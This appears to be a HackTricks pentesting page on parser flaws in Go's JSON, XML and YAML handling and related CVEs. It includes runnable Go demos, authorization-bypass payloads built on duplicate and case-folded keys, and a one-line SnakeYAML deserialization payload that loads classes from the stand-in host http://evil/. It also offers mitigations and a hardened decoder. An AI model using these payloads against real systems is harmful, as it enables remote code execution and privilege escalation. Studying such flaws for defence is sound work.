hacktricks/src/pentesting-web/json-xml-yaml-hacking.md

# JSON, XML & Yaml Hacking & Issues
{{#include ../banners/hacktricks-training.md}}
## Go JSON Decoder
The following issues were found in Go's JSON decoder, although they may exist in other languages too. They were published in [**this blog post**](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/).
Go's JSON, XML and YAML parsers have a long history of surprising defaults and unsafe configurations that can be abused to **bypass authentication or authorization**, **escalate privileges** or **exfiltrate sensitive data**.
### (Un)Marshaling Unexpected Data
The goal is to abuse structs that let an attacker read or write sensitive fields (e.g. `IsAdmin`, `Password`).
- Example struct:
```go
type User struct {
    Username string `json:"username,omitempty"`
    Password string `json:"password,omitempty"`
    IsAdmin  bool   `json:"-"`
}
```
- Common pitfalls
1. **Missing tag** (no tag = the field is still decoded, matched case-insensitively by its Go name):
```go
type User struct {
    Username string
}
```
Payload:
```json
{"Username": "admin"}
```
2. **Misuse of `-`** (`"-,omitempty"` does not exclude the field, it names the JSON key `-`):
```go
type User struct {
    IsAdmin bool `json:"-,omitempty"` // ❌ wrong: the field is now reachable under the key "-"
}
```
Payload:
```json
{"-": true}
```
✔️ The correct way to keep a field out of both unmarshaling (being set) and marshaling (being leaked) is the bare `-` tag:
```go
type User struct {
    IsAdmin bool `json:"-"`
}
```
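The three struct variants above, exercised end to end. This is an added example, not code from the page or from the Trail of Bits post; the struct names, the `mallory`/`root` users and the two payloads are constructed for the demonstration. It shows that the untagged field is set through its Go name, that the `-,omitempty` field is set through the key `-` and leaks on marshaling, and that the bare `-` tag closes both directions:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// NoTagUser has no struct tags: every exported field is reachable from JSON
// under its Go name (case-insensitively), including the sensitive one.
type NoTagUser struct {
	Username string
	IsAdmin  bool
}

// WrongDashUser misuses "-": "-,omitempty" does not hide IsAdmin, it renames
// the JSON key to "-", so the field can still be set and is still emitted.
type WrongDashUser struct {
	Username string `json:"username"`
	IsAdmin  bool   `json:"-,omitempty"`
}

// SafeUser uses the bare "-" tag, which removes IsAdmin from both directions.
type SafeUser struct {
	Username string `json:"username"`
	IsAdmin  bool   `json:"-"`
}

// Constructed attacker payloads (not captured from any real system).
const (
	PayloadByName = `{"username":"mallory","isadmin":true}` // hits the untagged field
	PayloadDash   = `{"username":"mallory","-":true}`       // hits the "-,omitempty" field
)

// DecodeNoTag returns IsAdmin after decoding into the untagged struct.
func DecodeNoTag(payload string) (bool, error) {
	var u NoTagUser
	err := json.Unmarshal([]byte(payload), &u)
	return u.IsAdmin, err
}

// DecodeWrongDash returns IsAdmin after decoding into the "-,omitempty" struct.
func DecodeWrongDash(payload string) (bool, error) {
	var u WrongDashUser
	err := json.Unmarshal([]byte(payload), &u)
	return u.IsAdmin, err
}

// DecodeSafe returns IsAdmin after decoding into the correctly tagged struct;
// the keys "-" and "IsAdmin" are simply ignored.
func DecodeSafe(payload string) (bool, error) {
	var u SafeUser
	err := json.Unmarshal([]byte(payload), &u)
	return u.IsAdmin, err
}

// LeakWrongDash shows the marshaling direction: an admin user serialised with
// the wrong tag leaks the flag under the key "-".
func LeakWrongDash() (string, error) {
	b, err := json.Marshal(WrongDashUser{Username: "root", IsAdmin: true})
	return string(b), err
}

func main() {
	a, _ := DecodeNoTag(PayloadByName)
	b, _ := DecodeWrongDash(PayloadDash)
	c, _ := DecodeSafe(PayloadDash)
	leak, _ := LeakWrongDash()
	fmt.Printf("no tag: IsAdmin=%v\nwrong dash: IsAdmin=%v\nsafe: IsAdmin=%v\nleak: %s\n", a, b, c, leak)
}
```

Note that `omitempty` hides the leak only while the flag is `false`; as soon as `IsAdmin` is `true` the key `-` appears in the output.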
### Parser Differentials
The goal is to bypass authorization by exploiting the fact that different parsers interpret the same payload differently, as in:
- CVE-2017-12635: Apache CouchDB privilege escalation via duplicate keys (Erlang vs JavaScript JSON parsers)
- 2022: Zoom 0-click RCE via XML parser inconsistencies
- GitLab 2025 SAML bypass via XML parsing quirks
**1. Duplicate Fields:**
Go's `encoding/json` keeps the **last** occurrence of a **field**.
```go
json.Unmarshal([]byte(`{"action":"UserAction", "action":"AdminAction"}`), &req)
fmt.Println(req.Action) // AdminAction
```
Other parsers may keep the **first** occurrence instead, or reject duplicate keys outright.
**2. Case-Insensitive Matching:**
Go matches JSON keys to struct fields case-insensitively:
```go
json.Unmarshal([]byte(`{"AcTiOn":"AdminAction"}`), &req)
// matches the `Action` field
```
Unicode tricks work too, because the match uses Unicode simple case folding: `ſ` (U+017F) folds to `s` and the Kelvin sign `K` (U+212A) folds to `k`:
```go
json.Unmarshal([]byte(`{"ationſ": "bypass"}`), &req)
// ſ is matched as if it were a plain s
```
**3. Cross-service mismatch:**
Consider:
- a proxy written in Go
- an AuthZ service written in Python
The attacker sends:
```json
{
  "action": "UserAction",
  "AcTiOn": "AdminAction"
}
```
- Python sees `UserAction` and allows the request
- Go sees `AdminAction` and executes it
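The differential from points 1 to 3 reproduced in one runnable program. This is an added example, not code from the page or the blog post; the `Req` struct, its `token`/`scope` fields and the payloads are constructed. A decode into `map[string]string` stands in for the case-sensitive consumer (the Python service in the scenario): Go's map keeps `action` and `AcTiOn` as two distinct entries, exactly as a Python dict would, so the two sides disagree only when the keys differ by case or by a folding Unicode character, not on exact duplicates, where both keep the last value:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Req is the request shape shared by the hypothetical Go proxy and the
// case-sensitive authorization service.
type Req struct {
	Action string `json:"action"`
	Token  string `json:"token"`
	Scope  string `json:"scope"`
}

// Constructed payloads.
const (
	DupPayload  = `{"action":"UserAction","action":"AdminAction"}` // exact duplicate
	CasePayload = `{"action":"UserAction","AcTiOn":"AdminAction"}` // differs only by case
	// \u212a is the Kelvin sign (folds to k), \u017f is the long s (folds to s);
	// the JSON escapes are decoded before the field match happens.
	UnicodePayload = `{"to\u212aen":"kelvin","\u017fcope":"long-s"}`
)

// GoView decodes the way encoding/json does into a struct: keys are matched
// case-insensitively (with Unicode folding) and the last match wins.
func GoView(payload string) (Req, error) {
	var r Req
	err := json.Unmarshal([]byte(payload), &r)
	return r, err
}

// StrictView stands in for a case-sensitive consumer: decoding into a map keeps
// every key verbatim, so "action" and "AcTiOn" are two different entries.
// Exact duplicates still resolve last-wins, as in Python's json.loads.
func StrictView(payload string) (map[string]string, error) {
	m := map[string]string{}
	err := json.Unmarshal([]byte(payload), &m)
	return m, err
}

// Differential reports the action each side would act on for one payload.
func Differential(payload string) (goAction, strictAction string, err error) {
	r, err := GoView(payload)
	if err != nil {
		return "", "", err
	}
	m, err := StrictView(payload)
	if err != nil {
		return "", "", err
	}
	return r.Action, m["action"], nil
}

func main() {
	for _, p := range []string{DupPayload, CasePayload} {
		g, s, err := Differential(p)
		fmt.Printf("%s\n  Go struct sees %q, case-sensitive map sees %q (err=%v)\n", p, g, s, err)
	}
	r, _ := GoView(UnicodePayload)
	fmt.Printf("Unicode folding: Token=%q Scope=%q\n", r.Token, r.Scope)
}
```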
### Data Format Confusion (Polyglots)
The goal is to abuse systems that mix formats (JSON/XML/YAML) or fail open on parser errors, as in:
- **CVE-2020-16250**: HashiCorp Vault parsed JSON with an XML parser after STS returned JSON instead of XML.
The attacker controlled:
- the `Accept: application/json` header sent to STS
- part of the JSON body
Go's XML parser parsed the response **anyway** and trusted the injected identity.
- Crafted payload:
```json
{
  "action": "Action_1",
  "AcTiOn": "Action_2",
  "ignored": "<?xml version=\"1.0\"?><Action>Action_3</Action>"
}
```
- **Go JSON** parser: `Action_2` (case-insensitive match + last wins)
- **YAML** parser: `Action_1` (case-sensitive)
- **XML** parser: finds `Action_3` inside the string value
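The JSON and XML halves of the polyglot, fed through both standard-library parsers. This is an added example, not code from the page, the blog post or Vault; the `Dispatch` function that selects a parser from a client-influenced content type, the `jsonReq`/`xmlReq` types and the body are constructed for the demonstration, and the XML declaration is left out of the body so that only the embedded element matters. The YAML side needs a third-party module and is not reproduced here. The point it makes is that `encoding/xml` discards everything before the first start element as character data, so the JSON framing around `<Action>` is simply skipped:

```go
package main

import (
	"encoding/json"
	"encoding/xml"
	"errors"
	"fmt"
)

// jsonReq is what the JSON path expects.
type jsonReq struct {
	Action string `json:"action"`
}

// xmlReq is what the XML path expects: a root <Action> element.
type xmlReq struct {
	XMLName xml.Name `xml:"Action"`
	Value   string   `xml:",chardata"`
}

// Polyglot is a constructed body (not captured from any system): valid JSON
// whose "ignored" string carries an XML element.
const Polyglot = `{"action":"Action_1","AcTiOn":"Action_2","ignored":"<Action>Action_3</Action>"}`

// ViaJSON: case-insensitive match, last occurrence wins.
func ViaJSON(body []byte) (string, error) {
	var r jsonReq
	if err := json.Unmarshal(body, &r); err != nil {
		return "", err
	}
	return r.Action, nil
}

// ViaXML: encoding/xml skips everything before the first start element, so the
// JSON text around the embedded <Action> is treated as ignorable character data
// and the element inside the string value becomes the document root.
func ViaXML(body []byte) (string, error) {
	var r xmlReq
	if err := xml.Unmarshal(body, &r); err != nil {
		return "", err
	}
	return r.Value, nil
}

// Dispatch mimics a service that picks the parser from a content type the
// client influences (the Accept header in the Vault case).
func Dispatch(body []byte, contentType string) (string, error) {
	switch contentType {
	case "application/json":
		return ViaJSON(body)
	case "application/xml", "text/xml":
		return ViaXML(body)
	}
	return "", errors.New("unsupported content type")
}

func main() {
	for _, ct := range []string{"application/json", "application/xml"} {
		action, err := Dispatch([]byte(Polyglot), ct)
		fmt.Printf("%-16s -> action=%q err=%v\n", ct, action, err)
	}
}
```

The defensive counterpart is to never let the caller choose the parser, and on the XML side to walk `xml.Decoder.Token()` and reject any non-whitespace character data before the root element instead of calling `xml.Unmarshal` directly.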
---
## Public Parser Vulnerabilities (2023-2025)
> The following publicly exploitable issues show that unsafe parsing is a multi-language problem, not a Go-only one.
### SnakeYAML Deserialization RCE (CVE-2022-1471)
* Affects: `org.yaml:snakeyaml` < **2.0** (used by Spring Boot, Jenkins, etc.).
* Root cause: `new Constructor()` instantiates **arbitrary Java classes** named by `!!` tags, enabling gadget chains that end in remote code execution.
* One-line PoC (loads attacker-controlled classes from `http://evil/`; the usual demo pops a calculator on the vulnerable host):
```yaml
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]
```
* Fix / Mitigation:
1. **Upgrade to ≥2.0** (the default constructor no longer instantiates arbitrary classes).
2. On older versions, explicitly use `new Yaml(new SafeConstructor())`.
### libyaml Double-Free (CVE-2024-35325)
* Affects: `libyaml` ≤0.2.5 (the C library behind many language bindings).
* Bug: calling `yaml_event_delete()` twice on the same event causes a double-free that attackers can turn into a DoS or, in some situations, heap corruption.
* Status: upstream rejected the report as "API misuse", but Linux distributions shipped a patched **0.2.6** that defensively nulls the freed pointer.
### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684)
* Affects: Tencent **RapidJSON** before commit `8269bc2` (<1.1.0-patch-22).
* Bug: unchecked arithmetic in `GenericReader::ParseNumber()` lets attackers craft numeric literals that underflow or overflow; the resulting memory corruption can escalate privileges when the parsed object graph drives authorization decisions.
---
### 🔐 Mitigations (Updated)
| Risk | Fix / Recommendation |
|-------------------------------------|------------------------------------------------------------|
| Unknown fields (JSON) | `decoder.DisallowUnknownFields()` (does not catch keys that differ from a known field only by case) |
| Duplicate fields (JSON) | No stdlib fix; pre-check the key stream with `json.Decoder.Token()` or a linter such as [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) |
| Case-insensitive matching (Go) | No stdlib fix; validate struct tags and canonicalize or allow-list keys before decoding |
| Stray text / embedded elements (XML) | Walk `xml.Decoder.Token()` and require the expected root element with only whitespace around it; Go's `encoding/xml` does not expand external entities, but disable DTD/external-entity processing in other XML libraries (XXE) |
| Unknown YAML keys | `dec.KnownFields(true)` on a `yaml.v3` Decoder |
| **Unsafe YAML deserialization** | Use `SafeConstructor` / upgrade to SnakeYAML 2.0 |
| libyaml 0.2.5 double-free | Upgrade to **0.2.6** or the distro-patched build |
| RapidJSON < patched commit | Build against a current RapidJSON (≥ July 2024) |
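A hardened Go decoder that implements the first three rows of the table. This is an added example, not code from the page or from any project; the `Req` type, the exact-case allow-list `allowedTopLevel` and the error values are constructed for the demonstration. `checkKeys` walks the `json.Decoder` token stream once and rejects any object whose keys collide under the same Unicode simple folding `encoding/json` uses (`strings.EqualFold`), plus any top-level key not spelled exactly as allowed; `LaxDecode` is kept beside it to show that `DisallowUnknownFields` alone lets `AcTiOn` through, because it still matches the `Action` field:

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"strings"
)

// Req is the single request type this hardened decoder accepts.
type Req struct {
	Action string `json:"action"`
}

// allowedTopLevel is the exact-case allow-list for top-level keys (hypothetical
// policy for this demo); nested objects only get the collision check below.
var allowedTopLevel = map[string]bool{"action": true}

var (
	ErrKeyCollision  = errors.New("json: duplicate or case-colliding object key")
	ErrKeyNotAllowed = errors.New("json: top-level key not in exact-case allow-list")
	ErrTrailingData  = errors.New("json: trailing data after value")
)

// checkKeys rejects any object in which two keys would map to the same struct
// field under encoding/json's matching, and any disallowed top-level key.
func checkKeys(data []byte) error {
	type frame struct {
		object    bool
		expectKey bool
		keys      []string
	}
	dec := json.NewDecoder(bytes.NewReader(data))
	var stack []*frame
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return err
		}
		if d, ok := tok.(json.Delim); ok {
			switch d {
			case '{':
				stack = append(stack, &frame{object: true, expectKey: true})
			case '[':
				stack = append(stack, &frame{})
			default: // '}' or ']': the container was a value of its parent
				stack = stack[:len(stack)-1]
				if len(stack) > 0 && stack[len(stack)-1].object {
					stack[len(stack)-1].expectKey = true
				}
			}
			continue
		}
		if len(stack) == 0 || !stack[len(stack)-1].object {
			continue // bare scalar document or array element
		}
		top := stack[len(stack)-1]
		if !top.expectKey {
			top.expectKey = true // scalar value consumed; next token is a key
			continue
		}
		key := tok.(string) // in an object, the token after a key position is always a string
		for _, seen := range top.keys {
			if strings.EqualFold(seen, key) {
				return fmt.Errorf("%w: %q vs %q", ErrKeyCollision, seen, key)
			}
		}
		if len(stack) == 1 && !allowedTopLevel[key] {
			return fmt.Errorf("%w: %q", ErrKeyNotAllowed, key)
		}
		top.keys = append(top.keys, key)
		top.expectKey = false
	}
}

// SafeDecode combines the pre-check with DisallowUnknownFields and a
// trailing-data check, so exactly one well-formed object is accepted.
func SafeDecode(data []byte) (Req, error) {
	var r Req
	if err := checkKeys(data); err != nil {
		return r, err
	}
	dec := json.NewDecoder(bytes.NewReader(data))
	dec.DisallowUnknownFields()
	if err := dec.Decode(&r); err != nil {
		return r, err
	}
	if _, err := dec.Token(); err != io.EOF {
		return r, ErrTrailingData
	}
	return r, nil
}

// LaxDecode uses only DisallowUnknownFields, which does NOT reject "AcTiOn".
func LaxDecode(data []byte) (Req, error) {
	var r Req
	dec := json.NewDecoder(bytes.NewReader(data))
	dec.DisallowUnknownFields()
	err := dec.Decode(&r)
	return r, err
}

func main() {
	for _, p := range []string{
		`{"action":"UserAction"}`,
		`{"action":"UserAction","AcTiOn":"AdminAction"}`,
		`{"action":"UserAction","action":"AdminAction"}`,
		`{"AcTiOn":"AdminAction"}`,
		`{"action":"UserAction","-":true}`,
	} {
		lax, lerr := LaxDecode([]byte(p))
		safe, serr := SafeDecode([]byte(p))
		fmt.Printf("%s\n  lax:  %q err=%v\n  safe: %q err=%v\n", p, lax.Action, lerr, safe.Action, serr)
	}
}
```

Running the pre-check on the raw bytes before the proxy forwards them also closes the cross-service differential: the Python side never sees a body that the Go side would read differently.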
## References
- Baeldung: Resolving CVE-2022-1471 With SnakeYAML 2.0
- Ubuntu Security Tracker: CVE-2024-35325 (libyaml)
{{#include ../banners/hacktricks-training.md}}